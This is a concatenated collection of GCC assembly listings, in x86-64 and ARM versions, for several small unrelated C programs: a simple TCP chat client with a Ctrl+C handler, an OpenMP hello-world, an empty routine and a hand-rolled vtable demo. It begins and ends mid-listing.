bl fopen str r0, [fp, #-2088] ldr r3, [fp, #-2088] cmp r3, #0 bne .L28 ldr r0, .L46+132 bl puts mov r0, #1 bl exit .L28: sub r3, fp, #1760 sub r3, r3, #4 sub r3, r3, #12 ldr r2, [fp, #-2088] mov r1, #255 mov r0, r3 bl fgets mov r3, r0 cmp r3, #0 beq .L29 sub r3, fp, #1760 sub r3, r3, #4 sub r3, r3, #12 mov r0, r3 bl puts b .L30 .L29: ldr r0, .L46+136 bl puts .L30: ldr r0, [fp, #-2088] bl fclose b .L24 .L17: ldr r0, .L46+140 bl printf b .L24 .L14: mov r3, #0 str r3, [fp, #-2124] b .L31 .L32: ldr r3, [fp, #-2124] add r3, r3, #1 mov r1, r3 ldr r0, .L46+144 bl printf sub r3, fp, #2048 sub r3, r3, #4 sub r3, r3, #8 ldr r2, [fp, #-2124] lsl r2, r2, #2 add r3, r3, r2 mov r1, r3 ldr r0, .L46+148 bl __isoc99_scanf ldr r3, [fp, #-2124] add r3, r3, #1 str r3, [fp, #-2124] .L31: ldr r3, [fp, #-2124] cmp r3, #14 ble .L32 mov r3, #0 str r3, [fp, #-2120] b .L33 .L37: ldr r3, [fp, #-2120] lsl r3, r3, #2 sub r2, fp, #4 add r3, r2, r3 ldr r3, [r3, #-2056] cmp r3, #0 bne .L34 sub r3, fp, #1840 sub r3, r3, #4 sub r3, r3, #12 ldr r2, [fp, #-2120] add r3, r3, r2 mov r2, #32 strb r2, [r3] b .L35 .L34: ldr r3, [fp, #-2120] lsl r3, r3, #2 sub r2, fp, #4 add r3, r2, r3 ldr r3, [r3, #-2056] cmp r3, #1 bne .L36 sub r3, fp, #1840 sub r3, r3, #4 sub r3, r3, #12 ldr r2, [fp, #-2120] add r3, r3, r2 mov r2, #42 strb r2, [r3] b .L35 .L36: ldr r0, .L46+152 bl printf bl getchar .L35: ldr r3, [fp, #-2120] add r3, r3, #1 str r3, [fp, #-2120] .L33: ldr r3, [fp, #-2120] cmp r3, #14 ble .L37 mov r3, #0 str r3, [fp, #-2140] mov r0, #10 bl putchar mov r0, #10 bl putchar mov r3, #0 str r3, [fp, #-2136] b .L38 .L41: mov r3, #0 str r3, [fp, #-2132] b .L39 .L40: sub r3, fp, #1840 sub r3, r3, #4 sub r3, r3, #12 ldr r2, [fp, #-2140] add r3, r3, r2 ldrb r3, [r3] @ zero_extendqisi2 mov r1, r3 ldr r0, .L46+156 bl printf ldr r3, [fp, #-2132] add r3, r3, #1 str r3, [fp, #-2132] ldr r3, [fp, #-2140] add r3, r3, #1 str r3, [fp, #-2140] .L39: ldr r3, [fp, #-2132] cmp r3, #2 ble .L40 mov r0, #10 bl putchar ldr r3, [fp, #-2136] add r3, r3, #1 str r3, [fp, #-2136] .L38: ldr r3, [fp, #-2136] cmp r3, #4 ble .L41 b .L24 .L45: nop .L24: sub r3, fp, #1984 sub r3, r3, #4 sub r3, r3, #12 mov r0, r3 mov r3, #136 mov r2, r3 mov r1, #0 bl memset .L4: ldr r3, [fp, #-2128] cmp r3, #6 bne .L42 ldr r0, [fp, #-2116] bl close mov r3, #0 ldr r2, .L46 ldr r1, [r2] ldr r2, [fp, #-8] eors r1, r2, r1 mov r2, #0 beq .L44 bl __stack_chk_fail .L44: mov r0, r3 sub sp, fp, #4 @ sp needed pop {fp, pc} .L47: .align 2 .L46: .word .LC37 .word 9002 .word .LC0 .word .LC1 .word .LC2 .word .LC3 .word .LC4 .word .LC5 .word .LC6 .word .LC7 .word .LC8 .word .LC9 .word .LC10 .word .LC11 .word .LC12 .word stdin .word .LC13 .word .LC14 .word .LC15 .word .LC16 .word .LC17 .word .LC18 .word .LC19 .word .LC20 .word .LC21 .word .LC22 .word .LC23 .word .LC24 .word .LC25 .word .LC26 .word .LC27 .word .LC28 .word .LC29 .word .LC30 .word .LC31 .word .LC32 .word .LC33 .word .LC34 .word .LC35 .word .LC36 .size main, .-main .ident "GCC: (Ubuntu 9.4.0-1ubuntu1~20.04.2) 9.4.0" .section .note.GNU-stack,"",%progbits
.file "897415.c" .intel_syntax noprefix .text .globl sfd .bss .align 4 .type sfd, @object .size sfd, 4 sfd: .zero 4 .section .rodata .LC0: .string "\nReceived SIGINT i.e ctrl+c" .align 8 .LC1: .string "Do you want to terminate the process (Y/N): " .LC2: .string "%s" .LC3: .string "Y" .text .globl my_signal_handler .type my_signal_handler, @function my_signal_handler: .LFB6: .cfi_startproc endbr64 push rbp .cfi_def_cfa_offset 16 .cfi_offset 6, -16 mov rbp, rsp .cfi_def_cfa_register 6 sub rsp, 32 mov DWORD PTR -20[rbp], edi mov rax, QWORD PTR fs:40 mov QWORD PTR -8[rbp], rax xor eax, eax cmp DWORD PTR -20[rbp], 2 jne .L4 lea rdi, .LC0[rip] call puts@PLT lea rdi, .LC1[rip] mov eax, 0 call printf@PLT lea rax, -10[rbp] mov rsi, rax lea rdi, .LC2[rip] mov eax, 0 call __isoc99_scanf@PLT movzx eax, BYTE PTR -10[rbp] movzx edx, BYTE PTR .LC3[rip] movzx eax, al movzx edx, dl sub eax, edx test eax, eax jne .L4 mov eax, DWORD PTR sfd[rip] mov edi, eax call close@PLT mov edi, 0 call exit@PLT .L4: nop mov rax, QWORD PTR -8[rbp] sub rax, QWORD PTR fs:40 je .L3 call __stack_chk_fail@PLT .L3: leave .cfi_def_cfa 7, 8 ret .cfi_endproc .LFE6: .size my_signal_handler, .-my_signal_handler .section .rodata .align 8 .LC4: .string "Usage: ./client <server_ip> <listening_port_of_server>" .align 8 .LC5: .string "Error in handling the SIGINT signal" .LC6: .string "Error in getaddrinfo" .align 8 .LC7: .string "Error in getting file descriptor to a socket" .LC8: .string "Could not connect to server" .align 8 .LC9: .string "Error in sending message to server" .align 8 .LC10: .string "Client: Message from Server: %s" .text .globl main .type main, @function main: .LFB7: .cfi_startproc endbr64 push rbp .cfi_def_cfa_offset 16 .cfi_offset 6, -16 mov rbp, rsp .cfi_def_cfa_register 6 sub rsp, 160 mov DWORD PTR -148[rbp], edi mov QWORD PTR -160[rbp], rsi mov rax, QWORD PTR fs:40 mov QWORD PTR -8[rbp], rax xor eax, eax cmp DWORD PTR -148[rbp], 3 je .L6 lea rdi, .LC4[rip] call puts@PLT mov eax, 0 jmp .L22 .L6: lea rsi, my_signal_handler[rip] mov edi, 2 call signal@PLT cmp rax, -1 jne .L8 lea rdi, .LC5[rip] call puts@PLT mov eax, 0 jmp .L22 .L8: lea rax, -112[rbp] mov edx, 48 mov esi, 0 mov rdi, rax call memset@PLT mov DWORD PTR -108[rbp], 0 mov DWORD PTR -104[rbp], 1 mov rax, QWORD PTR -160[rbp] add rax, 16 mov rsi, QWORD PTR [rax] mov rax, QWORD PTR -160[rbp] add rax, 8 mov rax, QWORD PTR [rax] lea rcx, -136[rbp] lea rdx, -112[rbp] mov rdi, rax call getaddrinfo@PLT test eax, eax je .L9 lea rdi, .LC6[rip] call puts@PLT mov eax, 0 jmp .L22 .L9: mov rax, QWORD PTR -136[rbp] mov QWORD PTR -128[rbp], rax jmp .L10 .L15: mov rax, QWORD PTR -128[rbp] mov edx, DWORD PTR 12[rax] mov rax, QWORD PTR -128[rbp] mov ecx, DWORD PTR 8[rax] mov rax, QWORD PTR -128[rbp] mov eax, DWORD PTR 4[rax] mov esi, ecx mov edi, eax call socket@PLT mov DWORD PTR sfd[rip], eax mov eax, DWORD PTR sfd[rip] cmp eax, -1 jne .L11 lea rdi, .LC7[rip] mov eax, 0 call printf@PLT jmp .L12 .L11: mov rax, QWORD PTR -128[rbp] mov edx, DWORD PTR 16[rax] mov rax, QWORD PTR -128[rbp] mov rcx, QWORD PTR 24[rax] mov eax, DWORD PTR sfd[rip] mov rsi, rcx mov edi, eax call connect@PLT test eax, eax je .L24 mov eax, DWORD PTR sfd[rip] mov edi, eax call close@PLT .L12: mov rax, QWORD PTR -128[rbp] mov rax, QWORD PTR 40[rax] mov QWORD PTR -128[rbp], rax .L10: cmp QWORD PTR -128[rbp], 0 jne .L15 jmp .L14 .L24: nop .L14: cmp QWORD PTR -128[rbp], 0 jne .L16 lea rdi, .LC8[rip] call puts@PLT mov eax, 0 jmp .L22 .L16: mov rax, QWORD PTR -136[rbp] mov rdi, rax call freeaddrinfo@PLT call fork@PLT test eax, eax jne .L20 jmp .L18 .L19: lea rax, -64[rbp] mov rdi, rax call strlen@PLT mov rdx, rax mov eax, DWORD PTR sfd[rip] lea rsi, -64[rbp] mov ecx, 0 mov edi, eax call send@PLT cmp rax, -1 jne .L18 lea rdi, .LC9[rip] call puts@PLT .L18: mov rdx, QWORD PTR stdin[rip] lea rax, -64[rbp] mov esi, 50 mov rdi, rax call fgets@PLT test rax, rax jne .L19 mov edi, 1 call exit@PLT .L21: lea rdx, -64[rbp] mov rax, QWORD PTR -120[rbp] add rax, rdx mov BYTE PTR [rax], 0 lea rax, -64[rbp] mov rsi, rax lea rdi, .LC10[rip] mov eax, 0 call printf@PLT .L20: mov eax, DWORD PTR sfd[rip] lea rsi, -64[rbp] mov ecx, 0 mov edx, 49 mov edi, eax call recv@PLT mov QWORD PTR -120[rbp], rax cmp QWORD PTR -120[rbp], 0 jg .L21 mov eax, 0 .L22: mov rcx, QWORD PTR -8[rbp] sub rcx, QWORD PTR fs:40 je .L23 call __stack_chk_fail@PLT .L23: leave .cfi_def_cfa 7, 8 ret .cfi_endproc .LFE7: .size main, .-main .ident "GCC: (Ubuntu 10.5.0-1ubuntu1~20.04) 10.5.0" .section .note.GNU-stack,"",@progbits .section .note.gnu.property,"a" .align 8 .long 1f - 0f .long 4f - 1f .long 5 0: .string "GNU" 1: .align 8 .long 0xc0000002 .long 3f - 2f 2: .long 0x3 3: .align 8 4:
.arch armv5t .eabi_attribute 20, 1 .eabi_attribute 21, 1 .eabi_attribute 23, 3 .eabi_attribute 24, 1 .eabi_attribute 25, 1 .eabi_attribute 26, 2 .eabi_attribute 30, 6 .eabi_attribute 34, 0 .eabi_attribute 18, 4 .file "897415.c" .text .comm sfd,4,4 .section .rodata .align 2 .LC0: .ascii "\012Received SIGINT i.e ctrl+c\000" .align 2 .LC1: .ascii "Do you want to terminate the process (Y/N): \000" .align 2 .LC2: .ascii "%s\000" .align 2 .LC3: .ascii "Y\000" .align 2 .LC4: .word __stack_chk_guard .text .align 2 .global my_signal_handler .syntax unified .arm .fpu softvfp .type my_signal_handler, %function my_signal_handler: @ args = 0, pretend = 0, frame = 16 @ frame_needed = 1, uses_anonymous_args = 0 push {fp, lr} add fp, sp, #4 sub sp, sp, #16 str r0, [fp, #-16] ldr r3, .L5 ldr r3, [r3] str r3, [fp, #-8] mov r3,#0 ldr r3, [fp, #-16] cmp r3, #2 bne .L4 ldr r0, .L5+4 bl puts ldr r0, .L5+8 bl printf sub r3, fp, #12 mov r1, r3 ldr r0, .L5+12 bl __isoc99_scanf ldrb r2, [fp, #-12] @ zero_extendqisi2 ldr r3, .L5+16 ldrb r3, [r3] @ zero_extendqisi2 sub r3, r2, r3 cmp r3, #0 bne .L4 ldr r3, .L5+20 ldr r3, [r3] mov r0, r3 bl close mov r0, #0 bl exit .L4: nop ldr r3, .L5 ldr r2, [r3] ldr r3, [fp, #-8] eors r2, r3, r2 mov r3, #0 beq .L3 bl __stack_chk_fail .L3: sub sp, fp, #4 @ sp needed pop {fp, pc} .L6: .align 2 .L5: .word .LC4 .word .LC0 .word .LC1 .word .LC2 .word .LC3 .word sfd .size my_signal_handler, .-my_signal_handler .section .rodata .align 2 .LC5: .ascii "Usage: ./client <server_ip> <listening_port_of_serv" .ascii "er>\000" .align 2 .LC6: .ascii "Error in handling the SIGINT signal\000" .align 2 .LC7: .ascii "Error in getaddrinfo\000" .align 2 .LC8: .ascii "Error in getting file descriptor to a socket\000" .align 2 .LC9: .ascii "Could not connect to server\000" .align 2 .LC10: .ascii "Error in sending message to server\000" .align 2 .LC11: .ascii "Client: Message from Server: %s\000" .align 2 .LC12: .word __stack_chk_guard .text .align 2 .global main .syntax unified .arm .fpu softvfp .type main, %function main: @ args = 0, pretend = 0, frame = 112 @ frame_needed = 1, uses_anonymous_args = 0 push {r4, fp, lr} add fp, sp, #8 sub sp, sp, #116 str r0, [fp, #-120] str r1, [fp, #-124] ldr r3, .L27 ldr r3, [r3] str r3, [fp, #-16] mov r3,#0 ldr r3, [fp, #-120] cmp r3, #3 beq .L8 ldr r0, .L27+4 bl puts mov r3, #0 b .L24 .L8: ldr r1, .L27+8 mov r0, #2 bl signal mov r3, r0 cmn r3, #1 bne .L10 ldr r0, .L27+12 bl puts mov r3, #0 b .L24 .L10: sub r3, fp, #100 mov r2, #32 mov r1, #0 mov r0, r3 bl memset mov r3, #0 str r3, [fp, #-96] mov r3, #1 str r3, [fp, #-92] ldr r3, [fp, #-124] add r3, r3, #4 ldr r0, [r3] ldr r3, [fp, #-124] add r3, r3, #8 ldr r1, [r3] sub r3, fp, #112 sub r2, fp, #100 bl getaddrinfo mov r3, r0 cmp r3, #0 beq .L11 ldr r0, .L27+16 bl puts mov r3, #0 b .L24 .L11: ldr r3, [fp, #-112] str r3, [fp, #-108] b .L12 .L17: ldr r3, [fp, #-108] ldr r0, [r3, #4] ldr r3, [fp, #-108] ldr r1, [r3, #8] ldr r3, [fp, #-108] ldr r3, [r3, #12] mov r2, r3 bl socket mov r3, r0 ldr r2, .L27+20 str r3, [r2] ldr r3, .L27+20 ldr r3, [r3] cmn r3, #1 bne .L13 ldr r0, .L27+24 bl printf b .L14 .L13: ldr r3, .L27+20 ldr r0, [r3] ldr r3, [fp, #-108] ldr r1, [r3, #20] ldr r3, [fp, #-108] ldr r3, [r3, #16] mov r2, r3 bl connect mov r3, r0 cmp r3, #0 beq .L26 ldr r3, .L27+20 ldr r3, [r3] mov r0, r3 bl close .L14: ldr r3, [fp, #-108] ldr r3, [r3, #28] str r3, [fp, #-108] .L12: ldr r3, [fp, #-108] cmp r3, #0 bne .L17 b .L16 .L26: nop .L16: ldr r3, [fp, #-108] cmp r3, #0 bne .L18 ldr r0, .L27+28 bl puts mov r3, #0 b .L24 .L18: ldr r3, [fp, #-112] mov r0, r3 bl freeaddrinfo bl fork mov r3, r0 cmp r3, #0 bne .L22 b .L20 .L21: ldr r3, .L27+20 ldr r4, [r3] sub r3, fp, #68 mov r0, r3 bl strlen mov r2, r0 sub r1, fp, #68 mov r3, #0 mov r0, r4 bl send mov r3, r0 cmn r3, #1 bne .L20 ldr r0, .L27+32 bl puts .L20: ldr r3, .L27+36 ldr r2, [r3] sub r3, fp, #68 mov r1, #50 mov r0, r3 bl fgets mov r3, r0 cmp r3, #0 bne .L21 mov r0, #1 bl exit .L23: sub r2, fp, #68 ldr r3, [fp, #-104] add r3, r2, r3 mov r2, #0 strb r2, [r3] sub r3, fp, #68 mov r1, r3 ldr r0, .L27+40 bl printf .L22: ldr r3, .L27+20 ldr r0, [r3] sub r1, fp, #68 mov r3, #0 mov r2, #49 bl recv str r0, [fp, #-104] ldr r3, [fp, #-104] cmp r3, #0 bgt .L23 mov r3, #0 .L24: ldr r2, .L27 ldr r1, [r2] ldr r2, [fp, #-16] eors r1, r2, r1 mov r2, #0 beq .L25 bl __stack_chk_fail .L25: mov r0, r3 sub sp, fp, #8 @ sp needed pop {r4, fp, pc} .L28: .align 2 .L27: .word .LC12 .word .LC5 .word my_signal_handler .word .LC6 .word .LC7 .word sfd .word .LC8 .word .LC9 .word .LC10 .word stdin .word .LC11 .size main, .-main .ident "GCC: (Ubuntu 9.4.0-1ubuntu1~20.04.2) 9.4.0" .section .note.GNU-stack,"",%progbits
.file "549.c" .intel_syntax noprefix .text .section .rodata .align 8 .LC0: .string "Hello World from OMP thread %d\n" .LC1: .string "Number of threads %d\n" .text .globl main .type main, @function main: .LFB0: .cfi_startproc endbr64 push rbp .cfi_def_cfa_offset 16 .cfi_offset 6, -16 mov rbp, rsp .cfi_def_cfa_register 6 sub rsp, 80 mov DWORD PTR -68[rbp], edi mov QWORD PTR -80[rbp], rsi mov rax, QWORD PTR fs:40 mov QWORD PTR -8[rbp], rax xor eax, eax call omp_get_thread_num@PLT mov DWORD PTR -56[rbp], eax mov eax, DWORD PTR -56[rbp] mov esi, eax lea rdi, .LC0[rip] mov eax, 0 call printf@PLT cmp DWORD PTR -56[rbp], 0 jne .L2 call omp_get_num_threads@PLT mov DWORD PTR -52[rbp], eax mov eax, DWORD PTR -52[rbp] mov esi, eax lea rdi, .LC1[rip] mov eax, 0 call printf@PLT .L2: mov eax, 0 mov rdx, QWORD PTR -8[rbp] sub rdx, QWORD PTR fs:40 je .L4 call __stack_chk_fail@PLT .L4: leave .cfi_def_cfa 7, 8 ret .cfi_endproc .LFE0: .size main, .-main .ident "GCC: (Ubuntu 10.5.0-1ubuntu1~20.04) 10.5.0" .section .note.GNU-stack,"",@progbits .section .note.gnu.property,"a" .align 8 .long 1f - 0f .long 4f - 1f .long 5 0: .string "GNU" 1: .align 8 .long 0xc0000002 .long 3f - 2f 2: .long 0x3 3: .align 8 4:
.arch armv5t .eabi_attribute 20, 1 .eabi_attribute 21, 1 .eabi_attribute 23, 3 .eabi_attribute 24, 1 .eabi_attribute 25, 1 .eabi_attribute 26, 2 .eabi_attribute 30, 6 .eabi_attribute 34, 0 .eabi_attribute 18, 4 .file "549.c" .text .section .rodata .align 2 .LC0: .ascii "Hello World from OMP thread %d\012\000" .align 2 .LC1: .ascii "Number of threads %d\012\000" .align 2 .LC2: .word __stack_chk_guard .text .align 2 .global main .syntax unified .arm .fpu softvfp .type main, %function main: @ args = 0, pretend = 0, frame = 56 @ frame_needed = 1, uses_anonymous_args = 0 push {fp, lr} add fp, sp, #4 sub sp, sp, #56 str r0, [fp, #-56] str r1, [fp, #-60] ldr r3, .L5 ldr r3, [r3] str r3, [fp, #-8] mov r3,#0 bl omp_get_thread_num str r0, [fp, #-48] ldr r1, [fp, #-48] ldr r0, .L5+4 bl printf ldr r3, [fp, #-48] cmp r3, #0 bne .L2 bl omp_get_num_threads str r0, [fp, #-44] ldr r1, [fp, #-44] ldr r0, .L5+8 bl printf .L2: mov r3, #0 ldr r2, .L5 ldr r1, [r2] ldr r2, [fp, #-8] eors r1, r2, r1 mov r2, #0 beq .L4 bl __stack_chk_fail .L4: mov r0, r3 sub sp, fp, #4 @ sp needed pop {fp, pc} .L6: .align 2 .L5: .word .LC2 .word .LC0 .word .LC1 .size main, .-main .ident "GCC: (Ubuntu 9.4.0-1ubuntu1~20.04.2) 9.4.0" .section .note.GNU-stack,"",%progbits
.file "192593.c" .intel_syntax noprefix .text .globl opaque_routine .type opaque_routine, @function opaque_routine: .LFB0: .cfi_startproc endbr64 push rbp .cfi_def_cfa_offset 16 .cfi_offset 6, -16 mov rbp, rsp .cfi_def_cfa_register 6 nop pop rbp .cfi_def_cfa 7, 8 ret .cfi_endproc .LFE0: .size opaque_routine, .-opaque_routine .ident "GCC: (Ubuntu 10.5.0-1ubuntu1~20.04) 10.5.0" .section .note.GNU-stack,"",@progbits .section .note.gnu.property,"a" .align 8 .long 1f - 0f .long 4f - 1f .long 5 0: .string "GNU" 1: .align 8 .long 0xc0000002 .long 3f - 2f 2: .long 0x3 3: .align 8 4:
.arch armv5t .eabi_attribute 20, 1 .eabi_attribute 21, 1 .eabi_attribute 23, 3 .eabi_attribute 24, 1 .eabi_attribute 25, 1 .eabi_attribute 26, 2 .eabi_attribute 30, 6 .eabi_attribute 34, 0 .eabi_attribute 18, 4 .file "192593.c" .text .align 2 .global opaque_routine .syntax unified .arm .fpu softvfp .type opaque_routine, %function opaque_routine: @ args = 0, pretend = 0, frame = 0 @ frame_needed = 1, uses_anonymous_args = 0 @ link register save eliminated. str fp, [sp, #-4]! add fp, sp, #0 nop add sp, fp, #0 @ sp needed ldr fp, [sp], #4 bx lr .size opaque_routine, .-opaque_routine .ident "GCC: (Ubuntu 9.4.0-1ubuntu1~20.04.2) 9.4.0" .section .note.GNU-stack,"",%progbits
.file "314649.c" .intel_syntax noprefix .text .globl alloc .type alloc, @function alloc: .LFB6: .cfi_startproc endbr64 push rbp .cfi_def_cfa_offset 16 .cfi_offset 6, -16 mov rbp, rsp .cfi_def_cfa_register 6 sub rsp, 32 mov QWORD PTR -24[rbp], rdi mov rax, QWORD PTR -24[rbp] mov eax, DWORD PTR 8[rax] cdqe mov rdi, rax call malloc@PLT mov QWORD PTR -8[rbp], rax mov rax, QWORD PTR -8[rbp] mov rdx, QWORD PTR -24[rbp] mov QWORD PTR [rax], rdx mov rax, QWORD PTR -8[rbp] leave .cfi_def_cfa 7, 8 ret .cfi_endproc .LFE6: .size alloc, .-alloc .globl Animal_getID .type Animal_getID, @function Animal_getID: .LFB7: .cfi_startproc endbr64 push rbp .cfi_def_cfa_offset 16 .cfi_offset 6, -16 mov rbp, rsp .cfi_def_cfa_register 6 mov QWORD PTR -8[rbp], rdi mov eax, 99 pop rbp .cfi_def_cfa 7, 8 ret .cfi_endproc .LFE7: .size Animal_getID, .-Animal_getID .globl Animal_vtable .section .data.rel.local,"aw" .align 8 .type Animal_vtable, @object .size Animal_vtable, 8 Animal_vtable: .quad Animal_getID .globl Animal_metadata .section .rodata .LC0: .string "Animal" .section .data.rel.local .align 16 .type Animal_metadata, @object .size Animal_metadata, 24 Animal_metadata: .quad .LC0 .long 8 .zero 4 .quad Animal_vtable .text .globl Dog_blort .type Dog_blort, @function Dog_blort: .LFB8: .cfi_startproc endbr64 push rbp .cfi_def_cfa_offset 16 .cfi_offset 6, -16 mov rbp, rsp .cfi_def_cfa_register 6 mov QWORD PTR -8[rbp], rdi nop pop rbp .cfi_def_cfa 7, 8 ret .cfi_endproc .LFE8: .size Dog_blort, .-Dog_blort .globl Dog_vtable .section .data.rel.local .align 16 .type Dog_vtable, @object .size Dog_vtable, 16 Dog_vtable: .quad Animal_getID .quad Dog_blort .globl Dog_metadata .section .rodata .LC1: .string "Dog" .section .data.rel.local .align 16 .type Dog_metadata, @object .size Dog_metadata, 24 Dog_metadata: .quad .LC1 .long 8 .zero 4 .quad Dog_vtable .text .globl Pekinese_foo .type Pekinese_foo, @function Pekinese_foo: .LFB9: .cfi_startproc endbr64 push rbp .cfi_def_cfa_offset 16 .cfi_offset 6, -16 mov rbp, rsp .cfi_def_cfa_register 6 sub rsp, 16 mov QWORD PTR -8[rbp], rdi mov rax, QWORD PTR -8[rbp] mov rax, QWORD PTR [rax] mov rax, QWORD PTR 16[rax] mov rdx, QWORD PTR [rax] mov rax, QWORD PTR -8[rbp] mov rdi, rax call rdx leave .cfi_def_cfa 7, 8 ret .cfi_endproc .LFE9: .size Pekinese_foo, .-Pekinese_foo .globl Pekinese_bar .type Pekinese_bar, @function Pekinese_bar: .LFB10: .cfi_startproc endbr64 push rbp .cfi_def_cfa_offset 16 .cfi_offset 6, -16 mov rbp, rsp .cfi_def_cfa_register 6 sub rsp, 16 mov QWORD PTR -8[rbp], rdi mov rax, QWORD PTR -8[rbp] mov rax, QWORD PTR [rax] mov rax, QWORD PTR 16[rax] mov rdx, QWORD PTR [rax] mov rax, QWORD PTR -8[rbp] mov rdi, rax call rdx leave .cfi_def_cfa 7, 8 ret .cfi_endproc .LFE10: .size Pekinese_bar, .-Pekinese_bar .globl Pekinese_vtable .section .data.rel.local .align 32 .type Pekinese_vtable, @object .size Pekinese_vtable, 32 Pekinese_vtable: .quad Animal_getID .quad Dog_blort .quad Pekinese_foo .quad Pekinese_bar .globl Pekinese_metadata .section .rodata .LC2: .string "Pekinese" .section .data.rel.local .align 16 .type Pekinese_metadata, @object .size Pekinese_metadata, 24 Pekinese_metadata: .quad .LC2 .long 8 .zero 4 .quad Pekinese_vtable .section .rodata .LC3: .string "%d\n" .text .globl main .type main, @function main: .LFB11: .cfi_startproc endbr64 push rbp .cfi_def_cfa_offset 16 .cfi_offset 6, -16 mov rbp, rsp .cfi_def_cfa_register 6 sub rsp, 32 mov DWORD PTR -20[rbp], edi mov QWORD PTR -32[rbp], rsi lea rdi, Pekinese_metadata[rip] call alloc mov QWORD PTR -8[rbp], rax mov rax, QWORD PTR -8[rbp] mov rax, QWORD PTR [rax] mov rax, QWORD PTR 16[rax] mov rdx, QWORD PTR [rax] mov rax, QWORD PTR -8[rbp] mov rdi, rax call rdx mov esi, eax lea rdi, .LC3[rip] mov eax, 0 call printf@PLT mov rax, QWORD PTR -8[rbp] mov rax, QWORD PTR [rax] mov rax, QWORD PTR 16[rax] mov rdx, QWORD PTR 16[rax] mov rax, QWORD PTR -8[rbp] mov rdi, rax call rdx mov esi, eax lea rdi, .LC3[rip] mov eax, 0 call printf@PLT mov rax, QWORD PTR -8[rbp] mov rax, QWORD PTR [rax] mov rax, QWORD PTR 16[rax] mov rdx, QWORD PTR 24[rax] mov rax, QWORD PTR -8[rbp] mov rdi, rax call rdx mov esi, eax lea rdi, .LC3[rip] mov eax, 0 call printf@PLT mov eax, 0 leave .cfi_def_cfa 7, 8 ret .cfi_endproc .LFE11: .size main, .-main .ident "GCC: (Ubuntu 10.5.0-1ubuntu1~20.04) 10.5.0" .section .note.GNU-stack,"",@progbits .section .note.gnu.property,"a" .align 8 .long 1f - 0f .long 4f - 1f .long 5 0: .string "GNU" 1: .align 8 .long 0xc0000002 .long 3f - 2f 2: .long 0x3 3: .align 8 4:
.arch armv5t .eabi_attribute 20, 1 .eabi_attribute 21, 1 .eabi_attribute 23, 3 .eabi_attribute 24, 1 .eabi_attribute 25, 1 .eabi_attribute 26, 2 .eabi_attribute 30, 6 .eabi_attribute 34, 0 .eabi_attribute 18, 4 .file "314649.c" .text .align 2 .global alloc .syntax unified .arm .fpu softvfp .type alloc, %function alloc: @ args = 0, pretend = 0, frame = 16 @ frame_needed = 1, uses_anonymous_args = 0 push {fp, lr} add fp, sp, #4 sub sp, sp, #16 str r0, [fp, #-16] ldr r3, [fp, #-16] ldr r3, [r3, #4] mov r0, r3 bl malloc mov r3, r0 str r3, [fp, #-8] ldr r3, [fp, #-8] ldr r2, [fp, #-16] str r2, [r3] ldr r3, [fp, #-8] mov r0, r3 sub sp, fp, #4 @ sp needed pop {fp, pc} .size alloc, .-alloc .align 2 .global Animal_getID .syntax unified .arm .fpu softvfp .type Animal_getID, %function Animal_getID: @ args = 0, pretend = 0, frame = 8 @ frame_needed = 1, uses_anonymous_args = 0 @ link register save eliminated. str fp, [sp, #-4]! add fp, sp, #0 sub sp, sp, #12 str r0, [fp, #-8] mov r3, #99 mov r0, r3 add sp, fp, #0 @ sp needed ldr fp, [sp], #4 bx lr .size Animal_getID, .-Animal_getID .global Animal_vtable .data .align 2 .type Animal_vtable, %object .size Animal_vtable, 4 Animal_vtable: .word Animal_getID .global Animal_metadata .section .rodata .align 2 .LC0: .ascii "Animal\000" .data .align 2 .type Animal_metadata, %object .size Animal_metadata, 12 Animal_metadata: .word .LC0 .word 4 .word Animal_vtable .text .align 2 .global Dog_blort .syntax unified .arm .fpu softvfp .type Dog_blort, %function Dog_blort: @ args = 0, pretend = 0, frame = 8 @ frame_needed = 1, uses_anonymous_args = 0 @ link register save eliminated. str fp, [sp, #-4]! add fp, sp, #0 sub sp, sp, #12 str r0, [fp, #-8] nop add sp, fp, #0 @ sp needed ldr fp, [sp], #4 bx lr .size Dog_blort, .-Dog_blort .global Dog_vtable .data .align 2 .type Dog_vtable, %object .size Dog_vtable, 8 Dog_vtable: .word Animal_getID .word Dog_blort .global Dog_metadata .section .rodata .align 2 .LC1: .ascii "Dog\000" .data .align 2 .type Dog_metadata, %object .size Dog_metadata, 12 Dog_metadata: .word .LC1 .word 4 .word Dog_vtable .text .align 2 .global Pekinese_foo .syntax unified .arm .fpu softvfp .type Pekinese_foo, %function Pekinese_foo: @ args = 0, pretend = 0, frame = 8 @ frame_needed = 1, uses_anonymous_args = 0 push {fp, lr} add fp, sp, #4 sub sp, sp, #8 str r0, [fp, #-8] ldr r3, [fp, #-8] ldr r3, [r3] ldr r3, [r3, #8] ldr r3, [r3] ldr r0, [fp, #-8] blx r3 mov r3, r0 mov r0, r3 sub sp, fp, #4 @ sp needed pop {fp, pc} .size Pekinese_foo, .-Pekinese_foo .align 2 .global Pekinese_bar .syntax unified .arm .fpu softvfp .type Pekinese_bar, %function Pekinese_bar: @ args = 0, pretend = 0, frame = 8 @ frame_needed = 1, uses_anonymous_args = 0 push {fp, lr} add fp, sp, #4 sub sp, sp, #8 str r0, [fp, #-8] ldr r3, [fp, #-8] ldr r3, [r3] ldr r3, [r3, #8] ldr r3, [r3] ldr r0, [fp, #-8] blx r3 mov r3, r0 mov r0, r3 sub sp, fp, #4 @ sp needed pop {fp, pc} .size Pekinese_bar, .-Pekinese_bar .global Pekinese_vtable .data .align 2 .type Pekinese_vtable, %object .size Pekinese_vtable, 16 Pekinese_vtable: .word Animal_getID .word Dog_blort .word Pekinese_foo .word Pekinese_bar .global Pekinese_metadata .section .rodata .align 2 .LC2: .ascii "Pekinese\000" .data .align 2 .type Pekinese_metadata, %object .size Pekinese_metadata, 12 Pekinese_metadata: .word .LC2 .word 4 .word Pekinese_vtable .section .rodata .align 2 .LC3: .ascii "%d\012\000" .text .align 2 .global main .syntax unified .arm .fpu softvfp .type main, %function main: @ args = 0, pretend = 0, frame = 16 @ frame_needed = 1, uses_anonymous_args = 0 push {fp, lr} add fp, sp, #4 sub sp, sp, #16 str r0, [fp, #-16] str r1, [fp, #-20] ldr r0, .L12 bl alloc str r0, [fp, #-8] ldr r3, [fp, #-8] ldr r3, [r3] ldr r3, [r3, #8] ldr r3, [r3] ldr r0, [fp, #-8] blx r3 mov r3, r0 mov r1, r3 ldr r0, .L12+4 bl printf ldr r3, [fp, #-8] ldr r3, [r3] ldr r3, [r3, #8] ldr r3, [r3, #8] ldr r0, [fp, #-8] blx r3 mov r3, r0 mov r1, r3 ldr r0, .L12+4 bl printf ldr r3, [fp, 